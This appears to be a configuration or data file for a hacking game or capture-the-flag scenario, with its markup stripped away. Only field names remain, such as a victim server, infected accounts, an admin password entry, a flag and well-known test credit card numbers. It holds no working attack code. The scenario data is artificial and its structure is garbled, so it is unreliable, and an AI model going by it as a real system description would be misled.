+ + + + + + + + + + + mythical_creatures + + + + + tiaspbiqe2r + + + true + + + + + + + + account + + + account + + + true + + + + + + + + account + + + false + + + + + + + + + + + + account + + + true + + + IP_addresses + + + + + + IP_addresses + + + account + + + + + + spoiler_admin_pass + + + + + + IP_addresses + + + + + + spoiler_admin_pass + + + + + + hb_server + + + + + + + + + + + + account + + + spoiler_admin_pass + + + IP_addresses + + + IP_addresses + + + IP_addresses + + + coconut_config + + + + + + + + IP_addresses + + + + + + spoiler_admin_pass + + + + + + victim_server + + + + + + + infected + + + + + + false + + + top_secret_file + flag + + + Visa 4111 1111 1111 1111 +American Express 3400 0000 0000 009 +Diner's Club 3000 0000 0000 04 + + + + + + + + + infected_account + + + true + + + coconut_config + + + + + + IP_addresses + + + + + + spoiler_admin_pass + + + +